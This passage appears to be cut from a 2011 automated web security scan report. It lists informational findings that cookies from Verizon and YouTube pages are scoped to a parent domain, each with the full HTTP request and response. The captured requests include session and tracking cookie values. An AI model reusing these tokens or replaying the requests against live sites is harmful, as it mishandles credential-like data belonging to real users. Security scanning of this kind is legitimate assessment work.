Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; gnVersion=2011Jul31030844; mybizCookie=true; mbox=session#1315278939788-568601#1315280871|PC#1315278939788-568601.19#1316488611|check#true#1315279071; CP=null*; SESSION_VALUE=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1!1315260938371; TIME_CHECKER=1315261253093; __utma=96859928.1921319434.1315279254.1315279254.1315279254.1; __utmb=96859928; __utmc=96859928; __utmz=96859928.1315279254.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

query=item%3DphoneFirst%26action%3DviewStoreIndex%26go%3D%2Fstore%2Fcontroller%26&fd=&go=%2Fstore%2Fcontroller&zipcode=10010&rememberMyZip=&state=&prevstate=&change=&filter=

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="Set-Cookie"
Connection: close
Date: Mon, 05 Sep 2011 22:20:58 GMT
Location: http://www.verizonwireless.com:80/b2c/store/controller?item=phoneFirst&action=viewStoreIndex
Set-Cookie: CARTVIEW=FALSE; domain=.verizonwireless.com; expires=Monday, 05-Sep-2011 22:40:58 GMT; path=/
Set-Cookie: ZIPCODE=10010; domain=.verizonwireless.com; expires=Sunday, 04-Dec-2011 22:20:58 GMT; path=/
Set-Cookie: CITY=New York; domain=.verizonwireless.com; expires=Sunday, 04-Dec-2011 22:20:58 GMT; path=/
Set-Cookie: STATE=NY; domain=.verizonwireless.com; expires=Sunday, 04-Dec-2011 22:20:58 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 387

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.verizonwireless.com:80/
...[SNIP]...

14.78. http://www.youtube.com/results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /results

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /results HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:37:09 GMT
Server: wiseguy/0.6.10
X-Content-Type-Options: nosniff
Set-Cookie: GEO=797cb795181fd5a70728e4cd351d4ac7cwsAAAAzVVMyF3tqTmVPFQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: pZGJ4MVNHYWdRd0pTTThUdXFGYVdNUkxhSExubThCRDd1U0I2UjFueWRNWFFWaEdjXzFjVi1B -->
<head>

<script>
var yt = yt || {};yt.timing = yt.timin
...[SNIP]...

14.79. http://www22.verizon.com/content/commontemplates/validlogin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /content/commontemplates/validlogin.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/commontemplates/validlogin.aspx HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/javascript; charset=utf-8
Content-Length: 638
Expires: Mon, 05 Sep 2011 22:24:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:10 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:29:10 GMT; path=/content/; domain=verizon.com

var aType=new Array("retailconsumer","retailgeneralbiz","eservices");var aLOB=new Array("myvz","myvzquickpay","concos","rescos","smbcos","retailgenbiz","retailconsumer","callassistant");var ckType='';
...[SNIP]...

14.80. http://www22.verizon.com/content/verizonglobalhome/Intermediate.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /content/verizonglobalhome/Intermediate.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/verizonglobalhome/Intermediate.aspx HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 366
Cache-Control: private, max-age=1666
Date: Mon, 05 Sep 2011 22:19:23 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:24:23 GMT; path=/content/; domain=verizon.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<title>Check Availability</title>

</head>
<body >


<iframe src
...[SNIP]...

14.81. http://www22.verizon.com/content/verizonglobalhome/setValues.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /content/verizonglobalhome/setValues.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /content/verizonglobalhome/setValues.aspx?getVal1=1 HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential
Content-Length: 0
Origin: http://www22.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; hbxRet=Y; V347=0; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; CP=null*; refURL=http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 72
Date: Mon, 05 Sep 2011 22:16:57 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:21:57 GMT; path=/content/; domain=verizon.com

hsi,High Speed Internet Without Phone,39.99*/?lid=//global//residential^

14.82. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/globalalert.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /onecms/vzcareers/ak-cached/4h/includes/javascript/globalalert.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onecms/vzcareers/ak-cached/4h/includes/javascript/globalalert.js HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/jobs/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 10 Jun 2011 06:12:44 GMT
ETag: "122432c-740-4a55575437140:dtagent326GVC7"
Accept-Ranges: bytes
Content-Length: 1856
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: application/x-javascript
Cache-Control: public, max-age=14400
Date: Mon, 05 Sep 2011 22:18:40 GMT
Connection: close
Set-Cookie: dtCookie=8C98328CB529EE605B41B254E42B3E4A; Path=/; Domain=.verizon.com
Set-Cookie: NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660;path=/;httponly

/* ---------------------------------------------------------------------------------------------------------
Verizon Services Operations IT - Creative Development
   Leads:
   Lolly Chessie (lolly.che
...[SNIP]...

14.83. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/interactivemaps-min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /onecms/vzcareers/ak-cached/4h/includes/javascript/interactivemaps-min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onecms/vzcareers/ak-cached/4h/includes/javascript/interactivemaps-min.js HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/jobs/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sun, 19 Jun 2011 05:45:55 GMT
ETag: "2dc2b4-4910-4a60a21ee6d00:dtagent326GVC7"
Accept-Ranges: bytes
Content-Length: 18704
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: application/x-javascript
Cache-Control: public, max-age=14400
Date: Mon, 05 Sep 2011 22:18:40 GMT
Connection: close
Set-Cookie: dtCookie=F0B2C87868F87FC6A655B69C67AB426A; Path=/; Domain=.verizon.com
Set-Cookie: NSC_xxx22_pofdnt_mcw=ffffffff895bfeca45525d5f4f58455e445a4a423660;path=/;httponly

var geocoder="";var map;var markersArray=[];var redmarkers=[];var prevElement="";var markerElement="";var directionsDisplay;var directionsService="";var busUnit="";var busunit="";var resultsStart=0;va
...[SNIP]...

14.84. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.autocomplete.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.autocomplete.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.autocomplete.js HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/jobs/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 19 May 2011 00:35:03 GMT
ETag: "12242dc-3648-4a3962d1ade00:dtagent326GVC7"
Accept-Ranges: bytes
Content-Length: 13896
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: application/x-javascript
Cache-Control: public, max-age=14400
Date: Mon, 05 Sep 2011 22:18:40 GMT
Connection: close
Set-Cookie: dtCookie=EE5AD3E136DED5D5213A809D2C43BE81; Path=/; Domain=.verizon.com
Set-Cookie: NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660;path=/;httponly

jQuery.autocomplete = function(input, options) {
   // Create a link to self
   var me = this;

   // Create jQuery object for input element
   var $input = $(input).attr("autocomplete", "off");

   // A
...[SNIP]...

14.85. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.fancybox-1.3.4.pack_blkbg.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.fancybox-1.3.4.pack_blkbg.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.fancybox-1.3.4.pack_blkbg.js HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/jobs/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 19 May 2011 00:35:03 GMT
ETag: "2dc2c1-3d64-4a3962d1ade00:dtagent326GVC7"
Accept-Ranges: bytes
Content-Length: 15716
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: application/x-javascript
Cache-Control: public, max-age=14400
Date: Mon, 05 Sep 2011 22:18:40 GMT
Connection: close
Set-Cookie: dtCookie=AD6328FE536A22C20265D4EAF77869AB; Path=/; Domain=.verizon.com
Set-Cookie: NSC_xxx22_pofdnt_mcw=ffffffff895bfeca45525d5f4f58455e445a4a423660;path=/;httponly

/*
* FancyBox - jQuery Plugin
* Simple and fancy lightbox alternative
*
* Examples and documentation at: http://fancybox.net
*
* Copyright (c) 2008 - 2010 Janis Skarnelis
* That said, i
...[SNIP]...

14.86. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/resizeFlashContent.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /onecms/vzcareers/ak-cached/4h/includes/javascript/resizeFlashContent.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onecms/vzcareers/ak-cached/4h/includes/javascript/resizeFlashContent.js HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/jobs/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 24 May 2011 07:49:04 GMT
ETag: "2dc2e6-3bb-4a400d279de40:dtagent326GVC7"
Accept-Ranges: bytes
Content-Length: 955
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: application/x-javascript
Cache-Control: public, max-age=14400
Date: Mon, 05 Sep 2011 22:18:40 GMT
Connection: close
Set-Cookie: dtCookie=2A590482738580C9C42A61F79126E809; Path=/; Domain=.verizon.com
Set-Cookie: NSC_xxx22_pofdnt_mcw=ffffffff895bfeca45525d5f4f58455e445a4a423660;path=/;httponly

// t: current time, b: begInnIng value, c: change In value, d: duration
jQuery.easing['jswing'] = jQuery.easing['swing'];

jQuery.extend( jQuery.easing,
{
   def: 'easeInOutQuart',
   swing: function (x,
...[SNIP]...

14.87. http://www22.verizon.com/onecms/vzcareers/includes/javascript/oo_engine.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /onecms/vzcareers/includes/javascript/oo_engine.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onecms/vzcareers/includes/javascript/oo_engine.js HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/jobs/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 21 Apr 2011 00:33:39 GMT
ETag: "50034e-73e-4a162e48aa100:dtagent326GVC7"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 1854
Cneonction: close
Content-Type: application/x-javascript
Expires: Mon, 05 Sep 2011 22:18:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:18:40 GMT
Connection: close
Set-Cookie: dtCookie=A528D23E157B5DAF5094EF7EAA13842D; Path=/; Domain=.verizon.com
Set-Cookie: NSC_xxx22_pofdnt_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660;path=/;httponly


/* OnlineOpinion (S3tS,1424b) */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */
var custom_var,_
...[SNIP]...

14.88. https://www22.verizon.com/FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 36780
Expires: Mon, 05 Sep 2011 22:38:01 GMT
Cache-Control: max-age=0, no-cache, no-store
